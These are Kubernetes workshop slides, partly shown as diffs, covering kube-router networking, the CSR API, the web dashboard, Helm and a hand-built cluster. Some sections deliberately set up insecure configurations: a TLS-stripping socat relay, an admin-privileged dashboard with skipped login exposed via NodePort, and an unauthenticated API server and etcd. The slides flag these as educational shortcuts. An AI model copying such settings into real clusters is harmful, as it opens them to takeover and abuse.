vim kuberouter.yaml
```
- Create the DaemonSet:
```bash
kubectl create -f kuberouter.yaml
```
]
Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
---
## Generating the kubeconfig for kubelet
- This is similar to what we did for the `kubenet` cluster
.exercise[
- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
```bash
kubectl --kubeconfig ~/kubeconfig config \
set-cluster kubenet --server http://`X.X.X.X`:8080
kubectl --kubeconfig ~/kubeconfig config \
set-context kubenet --cluster kubenet
kubectl --kubeconfig ~/kubeconfig config \
use-context kubenet
```
]
---
## Distributing kubeconfig
- We need to copy that kubeconfig file to the other nodes
.exercise[
- Copy `kubeconfig` to the other nodes:
```bash
for N in 2 3; do
scp ~/kubeconfig kuberouter$N:
done
```
]
---
## Starting kubelet
- We don't need the `--pod-cidr` option anymore
(the controller manager will allocate these automatically)
- We need to pass `--network-plugin=cni`
.exercise[
- Join the first node:
```bash
sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
```
- Open more terminals and join the other nodes:
```bash
ssh kuberouter2 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
ssh kuberouter3 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
```
]
---
## Setting up a test
- Let's create a Deployment and expose it with a Service
.exercise[
- Create a Deployment running a web server:
```bash
kubectl create deployment web --image=jpetazzo/httpenv
```
- Scale it so that it spans multiple nodes:
```bash
kubectl scale deployment web --replicas=5
```
- Expose it with a Service:
```bash
kubectl expose deployment web --port=8888
```
]
---
## Checking that everything works
.exercise[
- Get the ClusterIP address for the service:
```bash
kubectl get svc web
```
- Send a few requests there:
```bash
curl `X.X.X.X`:8888
```
]
Note that if you send multiple requests, they are load-balanced in a round-robin manner.
This shows that we are using IPVS (vs. iptables, which picks endpoints randomly).
---
## Troubleshooting
- What if we need to check that everything is working properly?
.exercise[
- Check the IP addresses of our pods:
```bash
kubectl get pods -o wide
```
- Check our routing table:
```bash
route -n
ip route
```
]
We should see the local pod CIDR connected to `kube-bridge`, and the other nodes' pod CIDRs having individual routes, with each node being the gateway.
---
## More troubleshooting
- We can also look at the output of the kube-router pods
(with `kubectl logs`)
- kube-router also comes with a special shell that gives lots of useful info
(we can access it with `kubectl exec`)
- But with the current setup of the cluster, these options may not work!
- Why?
---
## Trying `kubectl logs` / `kubectl exec`
.exercise[
- Try to show the logs of a kube-router pod:
```bash
kubectl -n kube-system logs ds/kube-router
```
- Or try to exec into one of the kube-router pods:
```bash
kubectl -n kube-system exec kube-router-xxxxx bash
```
]
These commands will give an error message that includes:
```
dial tcp: lookup kuberouterX on 127.0.0.11:53: no such host
```
What does that mean?
---
## Internal name resolution
- To execute these commands, the API server needs to connect to kubelet
- By default, it creates a connection using the kubelet's name
(e.g. `http://kuberouter1:...`)
- This requires our nodes names to be in DNS
- We can change that by setting a flag on the API server:
`--kubelet-preferred-address-types=InternalIP`
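A hedged sketch of how we could apply that on this particular cluster (assuming the API server runs as the `kube-apiserver` service in the Compose file we edited earlier):
```bash
# In docker-compose.yaml, append the flag to the kube-apiserver command line, e.g.:
#   command: kube-apiserver ... --kubelet-preferred-address-types=InternalIP
# then recreate just that service:
docker-compose up -d --force-recreate kube-apiserver
```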
---
## Another way to check the logs
- We can also ask the logs directly to the container engine
- First, get the container ID, with `docker ps` or like this:
```bash
CID=$(docker ps -q \
      --filter label=io.kubernetes.pod.namespace=kube-system \
      --filter label=io.kubernetes.container.name=kube-router)
```
- Then view the logs:
```bash
docker logs $CID
```
---
class: extra-details
## Other ways to distribute routing tables
- We don't need kube-router and BGP to distribute routes
- The list of nodes (and associated `podCIDR` subnets) is available through the API
- This shell snippet generates the commands to add all required routes on a node:
```bash
NODES=$(kubectl get nodes -o name | cut -d/ -f2)
for DESTNODE in $NODES; do
if [ "$DESTNODE" != "$HOSTNAME" ]; then
echo $(kubectl get node $DESTNODE -o go-template="
route add -net {{.spec.podCIDR}} gw {{(index .status.addresses 0).address}}")
fi
done
```
- This could be useful for embedded platforms with very limited resources
(or lab environments for learning purposes)
---
# Interconnecting clusters
- We assigned different Cluster CIDRs to each cluster
- This allows us to connect our clusters together
- We will leverage kube-router BGP abilities for that
- We will *peer* each kube-router instance with a *route reflector*
- As a result, we will be able to ping each other's pods
---
## Disclaimers
- There are many methods to interconnect clusters
- Depending on your network implementation, you will use different methods
- The method shown here only works for nodes with direct layer 2 connection
- We will often need to use tunnels or other network techniques
---
## The plan
- Someone will start the *route reflector*
(typically, that will be the person presenting these slides!)
- We will update our kube-router configuration
- We will add a *peering* with the route reflector
(instructing kube-router to connect to it and exchange route information)
- We should see the routes to other clusters on our nodes
(in the output of e.g. `route -n` or `ip route show`)
- We should be able to ping pods of other nodes
---
## Starting the route reflector
- Only do this if you are doing this on your own
- There is a Compose file in the `compose/frr-route-reflector` directory
- Before continuing, make sure that you have the IP address of the route reflector
---
## Configuring kube-router
- This can be done in two ways:
- with command-line flags to the `kube-router` process
- with annotations to Node objects
- We will use the command-line flags
(because it will automatically propagate to all nodes)
.footnote[Note: with Calico, this is achieved by creating a BGPPeer CRD.]
---
## Updating kube-router configuration
- We need to add two command-line flags to the kube-router process
.exercise[
- Edit the `kuberouter.yaml` file
- Add the following flags to the kube-router arguments:
```
- "--peer-router-ips=`X.X.X.X`"
- "--peer-router-asns=64512"
```
(Replace `X.X.X.X` with the route reflector address)
- Update the DaemonSet definition:
```bash
kubectl apply -f kuberouter.yaml
```
]
---
## Restarting kube-router
- The DaemonSet will not update the pods automatically
(it is using the default `updateStrategy`, which is `OnDelete`)
- We will therefore delete the pods
(they will be recreated with the updated definition)
.exercise[
- Delete all the kube-router pods:
```bash
kubectl delete pods -n kube-system -l k8s-app=kube-router
```
]
Note: the other `updateStrategy` for a DaemonSet is RollingUpdate.
<br/>
For critical services, we might want to precisely control the update process.
---
## Checking peering status
- We can see informative messages in the output of kube-router:
```
time="2019-04-07T15:53:56Z" level=info msg="Peer Up"
Key=X.X.X.X State=BGP_FSM_OPENCONFIRM Topic=Peer
```
- We should see the routes of the other clusters show up
- For debugging purposes, the reflector also exports a route to 1.0.0.2/32
- That route will show up like this:
```
1.0.0.2 172.31.X.Y 255.255.255.255 UGH 0 0 0 eth0
```
- We should be able to ping the pods of other clusters!
---
## If we wanted to do more ...
- kube-router can also export ClusterIP addresses
(by adding the flag `--advertise-cluster-ip`)
- They are exported individually (as /32)
- This would allow us to easily access other clusters' services
(without having to resolve the individual addresses of pods)
- Even better if it's combined with DNS integration
(to facilitate name → ClusterIP resolution)

View File

@@ -130,14 +130,6 @@ class: pic
---
class: pic
![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
---
class: extra-details
## Running the control plane on special nodes
- It is common to reserve a dedicated node for the control plane
@@ -160,8 +152,6 @@ class: extra-details
---
class: extra-details
## Running the control plane outside containers
- The services of the control plane can run in or out of containers
@@ -181,8 +171,6 @@ class: extra-details
---
class: extra-details
## Do we need to run Docker at all?
No!
@@ -199,8 +187,6 @@ No!
---
class: extra-details
## Do we need to run Docker at all?
Yes!
@@ -223,8 +209,6 @@ Yes!
---
class: extra-details
## Do we need to run Docker at all?
- On our development environments, CI pipelines ... :
@@ -241,21 +225,25 @@ class: extra-details
---
## Interacting with Kubernetes
## Kubernetes resources
- We will interact with our Kubernetes cluster through the Kubernetes API
- The Kubernetes API defines a lot of objects called *resources*
- The Kubernetes API is (mostly) RESTful
- It allows us to create, read, update, delete *resources*
- These resources are organized by type, or `Kind` (in the API)
- A few common resource types are:
- node (a machine — physical or virtual — in our cluster)
- pod (group of containers running together on a node)
- service (stable network endpoint to connect to one or multiple containers)
- namespace (more-or-less isolated group of things)
- secret (bundle of sensitive data to be passed to a container)
And much more!
- We can see the full list by running `kubectl api-resources`
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
---
@@ -265,16 +253,22 @@ class: pic
---
class: pic
![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
---
## Credits
- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
- it's one of the best Kubernetes architecture diagrams available!
- The second diagram is courtesy of Weave Works
- The first diagram is courtesy of Weave Works
- a *pod* can have multiple containers working together
- IP addresses are associated with *pods*, not with individual containers
- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
- it's one of the best Kubernetes architecture diagrams available!
Both diagrams used with permission.

View File

@@ -1,114 +0,0 @@
## Creating a chart
- We are going to show a way to create a *very simplified* chart
- In a real chart, *lots of things* would be templatized
(Resource names, service types, number of replicas...)
.exercise[
- Create a sample chart:
```bash
helm create dockercoins
```
- Move away the sample templates and create an empty template directory:
```bash
mv dockercoins/templates dockercoins/default-templates
mkdir dockercoins/templates
```
]
---
## Exporting the YAML for our application
- The following section assumes that DockerCoins is currently running
.exercise[
- Create one YAML file for each resource that we need:
.small[
```bash
while read kind name; do
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
done <<EOF
deployment worker
deployment hasher
daemonset rng
deployment webui
deployment redis
service hasher
service rng
service webui
service redis
EOF
```
]
]
---
## Testing our helm chart
.exercise[
- Let's install our helm chart! (`dockercoins` is the path to the chart)
```
helm install dockercoins
```
]
--
- Since the application is already deployed, this will fail:<br>
`Error: release loitering-otter failed: services "hasher" already exists`
- To avoid naming conflicts, we will deploy the application in another *namespace*
---
## Switching to another namespace
- We can create a new namespace and switch to it
(Helm will automatically use the namespace specified in our context)
- We can also tell Helm which namespace to use
.exercise[
- Tell Helm to use a specific namespace:
```bash
helm install dockercoins --namespace=magenta
```
]
---
## Checking our new copy of DockerCoins
- We can check the worker logs, or the web UI
.exercise[
- Retrieve the NodePort number of the web UI:
```bash
kubectl get service webui --namespace=magenta
```
- Open it in a web browser
- Look at the worker logs:
```bash
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
```
]
Note: it might take a minute or two for the worker to start.

View File

@@ -1,426 +0,0 @@
# The CSR API
- The Kubernetes API exposes CSR resources
- We can use these resources to issue TLS certificates
- First, we will go through a quick reminder about TLS certificates
- Then, we will see how to obtain a certificate for a user
- We will use that certificate to authenticate with the cluster
- Finally, we will grant some privileges to that user
---
## Reminder about TLS
- TLS (Transport Layer Security) is a protocol providing:
- encryption (to prevent eavesdropping)
- authentication (using public key cryptography)
- When we access an https:// URL, the server authenticates itself
(it proves its identity to us; as if it were "showing its ID")
- But we can also have mutual TLS authentication (mTLS)
(client proves its identity to server; server proves its identity to client)
---
## Authentication with certificates
- To authenticate, someone (client or server) needs:
- a *private key* (that remains known only to them)
- a *public key* (that they can distribute)
- a *certificate* (associating the public key with an identity)
- A message encrypted with the private key can only be decrypted with the public key
(and vice versa)
- If I use someone's public key to encrypt / decrypt their messages,
<br/>
I can be certain that I am talking to them / they are talking to me
- The certificate proves that I have the correct public key for them
---
## Certificate generation workflow
This is what I do if I want to obtain a certificate.
1. Create public and private key.
2. Create a Certificate Signing Request (CSR).
(The CSR contains my public key and the identity that I claim.)
3. Send that CSR to the Certificate Authority (CA).
4. The CA verifies that I can claim the identity in the CSR.
5. The CA generates my certificate and gives it to me.
The CA (or anyone else) never needs to know my private key.
---
## The CSR API
- The Kubernetes API has a CertificateSigningRequest resource type
(we can list them with e.g. `kubectl get csr`)
- We can create a CSR object
(= upload a CSR to the Kubernetes API)
- Then, using the Kubernetes API, we can approve / deny the request
- If we approve the request, the Kubernetes API generates a certificate
- The certificate gets attached to the CSR object and can be retrieved
---
## Using the CSR API
- We will show how to use the CSR API to obtain user certificates
- This will be a rather complex demo
- ... And yet, we will take a few shortcuts to simplify it
(but it will illustrate the general idea)
- The demo also won't be automated
(we would have to write extra code to make it fully functional)
---
## General idea
- We will create a Namespace named "users"
- Each user will get a ServiceAccount in that Namespace
- That ServiceAccount will give read/write access to *one* CSR object
- Users will use that ServiceAccount's token to submit a CSR
- We will approve the CSR (or not)
- Users can then retrieve their certificate from their CSR object
- ... And use that certificate for subsequent interactions
---
## Resource naming
For a user named `jean.doe`, we will have:
- ServiceAccount `jean.doe` in Namespace `users`
- CertificateSigningRequest `users:jean.doe`
- ClusterRole `users:jean.doe` giving read/write access to that CSR
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
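For reference, here is a hedged sketch of what such resources could look like (the names follow the convention above; the actual YAML file in the repository may differ in its details):
```bash
kubectl apply -f- <<'EOF'
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
  # "create" cannot be restricted by resourceNames
  # (the object name is not known at authorization time), so it gets its own rule
  - apiGroups: ["certificates.k8s.io"]
    resources: ["certificatesigningrequests"]
    verbs: ["create"]
  - apiGroups: ["certificates.k8s.io"]
    resources: ["certificatesigningrequests"]
    resourceNames: ["users:jean.doe"]
    verbs: ["get", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
  - kind: ServiceAccount
    name: jean.doe
    namespace: users
EOF
```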
---
## Creating the user's resources
.warning[If you want to use another name than `jean.doe`, update the YAML file!]
.exercise[
- Create the global namespace for all users:
```bash
kubectl create namespace users
```
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
```bash
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
```
]
---
## Extracting the user's token
- Let's obtain the user's token and give it to them
(the token will be their password)
.exercise[
- List the user's secrets:
```bash
kubectl --namespace=users describe serviceaccount jean.doe
```
- Show the user's token:
```bash
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
```
]
---
## Configure `kubectl` to use the token
- Let's create a new context that will use that token to access the API
.exercise[
- Add a new identity to our kubeconfig file:
```bash
kubectl config set-credentials token:jean.doe --token=...
```
- Add a new context using that identity:
```bash
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
```
]
---
## Access the API with the token
- Let's check that our access rights are set properly
.exercise[
- Try to access any resource:
```bash
kubectl get pods
```
(This should tell us "Forbidden")
- Try to access "our" CertificateSigningRequest:
```bash
kubectl get csr users:jean.doe
```
(This should tell us "NotFound")
]
---
## Create a key and a CSR
- There are many tools to generate TLS keys and CSRs
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
.exercise[
- Generate the key and certificate signing request:
```bash
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
```
]
The command above generates:
- a 2048-bit RSA key, without DES encryption, stored in key.pem
- a CSR for the name `jean.doe` in group `devs`
---
## Inside the Kubernetes CSR object
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
- The PEM file needs to be encoded to base64 on a single line
(we will use `base64 -w0` for that purpose)
- The Kubernetes CSR object also needs to list the right "usages"
(these are flags indicating how the certificate can be used)
---
## Sending the CSR to Kubernetes
.exercise[
- Generate and create the CSR resource:
```bash
kubectl apply -f - <<EOF
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
name: users:jean.doe
spec:
request: $(base64 -w0 < csr.pem)
usages:
- digital signature
- key encipherment
- client auth
EOF
```
]
---
## Adjusting certificate expiration
- By default, the CSR API generates certificates valid for 1 year
- We want to generate short-lived certificates, so we will lower that to 1 hour
- For now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
.exercise[
- Edit the static pod definition for the controller manager:
```bash
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
```
- In the list of flags, add the following line:
```bash
- --experimental-cluster-signing-duration=1h
```
]
---
## Verifying and approving the CSR
- Let's inspect the CSR, and if it is valid, approve it
.exercise[
- Switch back to `cluster-admin`:
```bash
kctx -
```
- Inspect the CSR:
```bash
kubectl describe csr users:jean.doe
```
- Approve it:
```bash
kubectl certificate approve users:jean.doe
```
]
---
## Obtaining the certificate
.exercise[
- Switch back to the user's identity:
```bash
kctx -
```
- Retrieve the certificate from the CSR:
```bash
kubectl get csr users:jean.doe \
-o jsonpath={.status.certificate} \
| base64 -d > cert.pem
```
- Inspect the certificate:
```bash
openssl x509 -in cert.pem -text -noout
```
]
---
## Using the certificate
.exercise[
- Add the key and certificate to kubeconfig:
```bash
kubectl config set-credentials cert:jean.doe --embed-certs \
--client-certificate=cert.pem --client-key=key.pem
```
- Update the user's context to use the key and cert to authenticate:
```bash
kubectl config set-context jean.doe --user cert:jean.doe
```
- Confirm that we are seen as `jean.doe` (but don't have permissions):
```bash
kubectl get pods
```
]
---
## What's missing?
We have shown, step by step, a method to issue short-lived certificates for users.
To be usable in real environments, we would need to add:
- a kubectl helper to automatically generate the CSR and obtain the cert
(and transparently renew the cert when needed)
- a Kubernetes controller to automatically validate and approve CSRs
(checking that the subject and groups are valid)
- a way for the users to know the groups to add to their CSR
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
---
## Is this realistic?
- Larger organizations typically integrate with their own directory
- The general principle, however, is the same:
- users have long-term credentials (password, token, ...)
- they use these credentials to obtain other, short-lived credentials
- This provides enhanced security:
- the long-term credentials can use long passphrases, 2FA, HSM ...
- the short-term credentials are more convenient to use
- we get strong security *and* convenience
- Systems like Vault also have certificate issuance mechanisms

View File

@@ -36,9 +36,7 @@
## Creating a daemon set
<!-- ##VERSION## -->
- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
- Unfortunately, as of Kubernetes 1.12, the CLI cannot create daemon sets
--
@@ -73,13 +71,18 @@
- Dump the `rng` resource in YAML:
```bash
kubectl get deploy/rng -o yaml >rng.yml
kubectl get deploy/rng -o yaml --export >rng.yml
```
- Edit `rng.yml`
]
Note: `--export` will remove "cluster-specific" information, i.e.:
- namespace (so that the resource is not tied to a specific namespace)
- status and creation timestamp (useless when creating a new resource)
- resourceVersion and uid (these would cause... *interesting* problems)
---
## "Casting" a resource to another

View File

@@ -2,60 +2,88 @@
- Kubernetes resources can also be viewed with a web dashboard
- That dashboard is usually exposed over HTTPS
- We are going to deploy that dashboard with *three commands:*
(this requires obtaining a proper TLS certificate)
1) actually *run* the dashboard
- Dashboard users need to authenticate
2) bypass SSL for the dashboard
- We are going to take a *dangerous* shortcut
3) bypass authentication for the dashboard
---
--
## The insecure method
There is an additional step to make the dashboard available from outside (we'll get to that)
- We could (and should) use [Let's Encrypt](https://letsencrypt.org/) ...
- ... but we don't want to deal with TLS certificates
- We could (and should) learn how authentication and authorization work ...
- ... but we will use a guest account with admin access instead
--
.footnote[.warning[Yes, this will open our cluster to all kinds of shenanigans. Don't do this at home.]]
---
## Running a very insecure dashboard
## 1) Running the dashboard
- We are going to deploy that dashboard with *one single command*
- We need to create a *deployment* and a *service* for the dashboard
- This command will create all the necessary resources
- But also a *secret*, a *service account*, a *role* and a *role binding*
(the dashboard itself, the HTTP wrapper, the admin/guest account)
- All these resources are defined in a YAML file
- All we have to do is load that YAML file with `kubectl apply -f`
- All these things can be defined in a YAML file and created with `kubectl apply -f`
.exercise[
- Create all the dashboard resources, with the following command:
```bash
kubectl apply -f ~/container.training/k8s/insecure-dashboard.yaml
kubectl apply -f ~/container.training/k8s/kubernetes-dashboard.yaml
```
]
---
## 2) Bypassing SSL for the dashboard
- The Kubernetes dashboard uses HTTPS, but we don't have a certificate
- Recent versions of Chrome (63 and later) and Edge will refuse to connect
(You won't even get the option to ignore a security warning!)
- We could (and should!) get a certificate, e.g. with [Let's Encrypt](https://letsencrypt.org/)
- ... But for convenience, for this workshop, we'll forward HTTP to HTTPS
.warning[Do not do this at home, or even worse, at work!]
---
## Running the SSL unwrapper
- We are going to run [`socat`](http://www.dest-unreach.org/socat/doc/socat.html), telling it to accept TCP connections and relay them over SSL
- Then we will expose that `socat` instance with a `NodePort` service
- For convenience, these steps are neatly encapsulated into another YAML file
.exercise[
- Apply the convenient YAML file, and defeat SSL protection:
```bash
kubectl apply -f ~/container.training/k8s/socat.yaml
```
]
.warning[All our dashboard traffic is now clear-text, including passwords!]
---
## Connecting to the dashboard
.exercise[
- Check which port the dashboard is on:
```bash
kubectl get svc dashboard
kubectl -n kube-system get svc socat
```
]
@@ -85,7 +113,26 @@ The dashboard will then ask you which authentication you want to use.
- "skip" (use the dashboard "service account")
- Let's use "skip": we're logged in!
- Let's use "skip": we get a bunch of warnings and don't see much
---
## 3) Bypass authentication for the dashboard
- The dashboard documentation [explains how to do this](https://github.com/kubernetes/dashboard/wiki/Access-control#admin-privileges)
- We just need to load another YAML file!
.exercise[
- Grant admin privileges to the dashboard so we can see our resources:
```bash
kubectl apply -f ~/container.training/k8s/grant-admin-to-dashboard.yaml
```
- Reload the dashboard and enjoy!
]
--
@@ -93,11 +140,73 @@ The dashboard will then ask you which authentication you want to use.
---
## Exposing the dashboard over HTTPS
- We took a shortcut by forwarding HTTP to HTTPS inside the cluster
- Let's expose the dashboard over HTTPS!
- The dashboard is exposed through a `ClusterIP` service (internal traffic only)
- We will change that into a `NodePort` service (accepting outside traffic)
.exercise[
- Edit the service:
```
kubectl edit service kubernetes-dashboard
```
]
--
`NotFound`?!? Y U NO WORK?!?
---
## Editing the `kubernetes-dashboard` service
- If we look at the [YAML](https://github.com/jpetazzo/container.training/blob/master/k8s/kubernetes-dashboard.yaml) that we loaded before, we'll get a hint
--
- The dashboard was created in the `kube-system` namespace
--
.exercise[
- Edit the service:
```bash
kubectl -n kube-system edit service kubernetes-dashboard
```
- Change `type:` from `ClusterIP` to `NodePort`, save, and exit
<!--
```wait Please edit the object below```
```keys /ClusterIP```
```keys ^J```
```keys cwNodePort```
```keys ^[ ``` ]
```keys :wq```
```keys ^J```
-->
- Check the port that was assigned with `kubectl -n kube-system get services`
- Connect to https://oneofournodes:3xxxx/ (yes, https)
]
---
## Running the Kubernetes dashboard securely
- The steps that we just showed you are *for educational purposes only!*
- If you do that on your production cluster, people [can and will abuse it](https://redlock.io/blog/cryptojacking-tesla)
- If you do that on your production cluster, people [can and will abuse it](https://blog.redlock.io/cryptojacking-tesla)
- For an in-depth discussion about securing the dashboard,
<br/>

View File

@@ -1,20 +1,6 @@
## Declarative vs imperative in Kubernetes
- With Kubernetes, we cannot say: "run this container"
- All we can do is write a *spec* and push it to the API server
(by creating a resource like e.g. a Pod or a Deployment)
- The API server will validate that spec (and reject it if it's invalid)
- Then it will store it in etcd
- A *controller* will "notice" that spec and act upon it
---
## Reconciling state
- Virtually everything we create in Kubernetes is created from a *spec*
- Watch for the `spec` fields in the YAML files later!

View File

@@ -1,67 +0,0 @@
## 19,000 words
They say, "a picture is worth one thousand words."
The following 19 slides show what really happens when we run:
```bash
kubectl run web --image=nginx --replicas=3
```
---
class: pic
![](images/kubectl-run-slideshow/01.svg)
---
class: pic
![](images/kubectl-run-slideshow/02.svg)
---
class: pic
![](images/kubectl-run-slideshow/03.svg)
---
class: pic
![](images/kubectl-run-slideshow/04.svg)
---
class: pic
![](images/kubectl-run-slideshow/05.svg)
---
class: pic
![](images/kubectl-run-slideshow/06.svg)
---
class: pic
![](images/kubectl-run-slideshow/07.svg)
---
class: pic
![](images/kubectl-run-slideshow/08.svg)
---
class: pic
![](images/kubectl-run-slideshow/09.svg)
---
class: pic
![](images/kubectl-run-slideshow/10.svg)
---
class: pic
![](images/kubectl-run-slideshow/11.svg)
---
class: pic
![](images/kubectl-run-slideshow/12.svg)
---
class: pic
![](images/kubectl-run-slideshow/13.svg)
---
class: pic
![](images/kubectl-run-slideshow/14.svg)
---
class: pic
![](images/kubectl-run-slideshow/15.svg)
---
class: pic
![](images/kubectl-run-slideshow/16.svg)
---
class: pic
![](images/kubectl-run-slideshow/17.svg)
---
class: pic
![](images/kubectl-run-slideshow/18.svg)
---
class: pic
![](images/kubectl-run-slideshow/19.svg)

View File

@@ -1,837 +0,0 @@
# Building our own cluster
- Let's build our own cluster!
*Perfection is attained not when there is nothing left to add, but when there is nothing left to take away. (Antoine de Saint-Exupery)*
- Our goal is to build a minimal cluster allowing us to:
- create a Deployment (with `kubectl run` or `kubectl create deployment`)
- expose it with a Service
- connect to that service
- "Minimal" here means:
- smaller number of components
- smaller number of command-line flags
- smaller number of configuration files
---
## Non-goals
- For now, we don't care about security
- For now, we don't care about scalability
- For now, we don't care about high availability
- All we care about is *simplicity*
---
## Our environment
- We will use the machine indicated as `dmuc1`
(this stands for "Dessine Moi Un Cluster" or "Draw Me A Sheep",
<br/>in homage to Saint-Exupery's "The Little Prince")
- This machine:
- runs Ubuntu LTS
- has Kubernetes, Docker, and etcd binaries installed
- but nothing is running
---
## Checking our environment
- Let's make sure we have everything we need first
.exercise[
- Log into the `dmuc1` machine
- Get root:
```bash
sudo -i
```
- Check available versions:
```bash
etcd -version
kube-apiserver --version
dockerd --version
```
]
---
## The plan
1. Start API server
2. Interact with it (create Deployment and Service)
3. See what's broken
4. Fix it and go back to step 2 until it works!
---
## Dealing with multiple processes
- We are going to start many processes
- Depending on what you're comfortable with, you can:
- open multiple windows and multiple SSH connections
- use a terminal multiplexer like screen or tmux
- put processes in the background with `&`
<br/>(warning: log output might get confusing to read!)
---
## Starting API server
.exercise[
- Try to start the API server:
```bash
kube-apiserver
# It will fail with "--etcd-servers must be specified"
```
]
Since the API server stores everything in etcd,
it cannot start without it.
---
## Starting etcd
.exercise[
- Try to start etcd:
```bash
etcd
```
]
Success!
Note the last line of output:
```
serving insecure client requests on 127.0.0.1:2379, this is strongly discouraged!
```
*Sure, that's discouraged. But thanks for telling us the address!*
---
## Starting API server (for real)
- Try again, passing the `--etcd-servers` argument
- That argument should be a comma-separated list of URLs
.exercise[
- Start API server:
```bash
kube-apiserver --etcd-servers http://127.0.0.1:2379
```
]
Success!
---
## Interacting with API server
- Let's try a few "classic" commands
.exercise[
- List nodes:
```bash
kubectl get nodes
```
- List services:
```bash
kubectl get services
```
]
So far, so good.
Note: the API server automatically created the `kubernetes` service entry.
---
class: extra-details
## What about `kubeconfig`?
- We didn't need to create a `kubeconfig` file
- By default, the API server is listening on `localhost:8080`
(without requiring authentication)
- By default, `kubectl` connects to `localhost:8080`
(without providing authentication)
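We can double-check this by querying the insecure port directly (no authentication needed):
```bash
curl http://localhost:8080/version
```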
---
## Creating a Deployment
- Let's run a web server!
.exercise[
- Create a Deployment with NGINX:
```bash
kubectl create deployment web --image=nginx
```
]
Success?
---
## Checking our Deployment status
.exercise[
- Look at pods, deployments, etc.:
```bash
kubectl get all
```
]
Our Deployment is in a bad shape:
```
NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/web 0/1 0 0 2m26s
```
And, there is no ReplicaSet, and no Pod.
---
## What's going on?
- We stored the definition of our Deployment in etcd
(through the API server)
- But there is no *controller* to do the rest of the work
- We need to start the *controller manager*
---
## Starting the controller manager
.exercise[
- Try to start the controller manager:
```bash
kube-controller-manager
```
]
The final error message is:
```
invalid configuration: no configuration has been provided
```
But the logs include another useful piece of information:
```
Neither --kubeconfig nor --master was specified.
Using the inClusterConfig. This might not work.
```
---
## Reminder: everyone talks to API server
- The controller manager needs to connect to the API server
- It *does not* have a convenient `localhost:8080` default
- We can pass the connection information in two ways:
- `--master` and a host:port combination (easy)
- `--kubeconfig` and a `kubeconfig` file
- For simplicity, we'll use the first option
---
## Starting the controller manager (for real)
.exercise[
- Start the controller manager:
```bash
kube-controller-manager --master http://localhost:8080
```
]
Success!
---
## Checking our Deployment status
.exercise[
- Check all our resources again:
```bash
kubectl get all
```
]
We now have a ReplicaSet.
But we still don't have a Pod.
---
## What's going on?
In the controller manager logs, we should see something like this:
```
E0404 15:46:25.753376 22847 replica_set.go:450] Sync "default/web-5bc9bd5b8d"
failed with `No API token found for service account "default"`, retry after the
token is automatically created and added to the service account
```
- The service account `default` was automatically added to our Deployment
(and to its pods)
- The service account `default` exists
- But it doesn't have an associated token
(the token is a secret; creating it requires signature; therefore a CA)
---
## Solving the missing token issue
There are many ways to solve that issue.
We are going to list a few (to get an idea of what's happening behind the scenes).
Of course, we don't need to apply *all* the solutions mentioned here (any one of them is enough).
---
## Option 1: disable service accounts
- Restart the API server with
`--disable-admission-plugins=ServiceAccount`
- The API server will no longer add a service account automatically
- Our pods will be created without a service account
---
## Option 2: do not mount the (missing) token
- Add `automountServiceAccountToken: false` to the Deployment spec
*or*
- Add `automountServiceAccountToken: false` to the default ServiceAccount
- The ReplicaSet controller will no longer create pods referencing the (missing) token
.exercise[
- Programmatically change the `default` ServiceAccount:
```bash
kubectl patch sa default -p "automountServiceAccountToken: false"
```
]
---
## Option 3: set up service accounts properly
- This is the most complex option!
- Generate a key pair
- Pass the private key to the controller manager
(to generate and sign tokens)
- Pass the public key to the API server
(to verify these tokens)
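A minimal sketch of option 3, using the standard flags (key paths are illustrative, and each process is started in its own terminal, as before):
```bash
# Generate a key pair for signing/verifying service account tokens
openssl genrsa -out /tmp/sa.key 2048
openssl rsa -in /tmp/sa.key -pubout -out /tmp/sa.pub

# Controller manager signs tokens with the private key
kube-controller-manager --master http://localhost:8080 \
  --service-account-private-key-file=/tmp/sa.key

# API server verifies tokens with the public key
kube-apiserver --etcd-servers http://127.0.0.1:2379 \
  --service-account-key-file=/tmp/sa.pub
```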
---
## Continuing without service account token
- Once we patch the default service account, the ReplicaSet can create a Pod
.exercise[
- Check that we now have a pod:
```bash
kubectl get all
```
]
Note: we might have to wait a bit for the ReplicaSet controller to retry.
If we're impatient, we can restart the controller manager.
---
## What's next?
- Our pod exists, but it is in `Pending` state
- Remember, we don't have a node so far
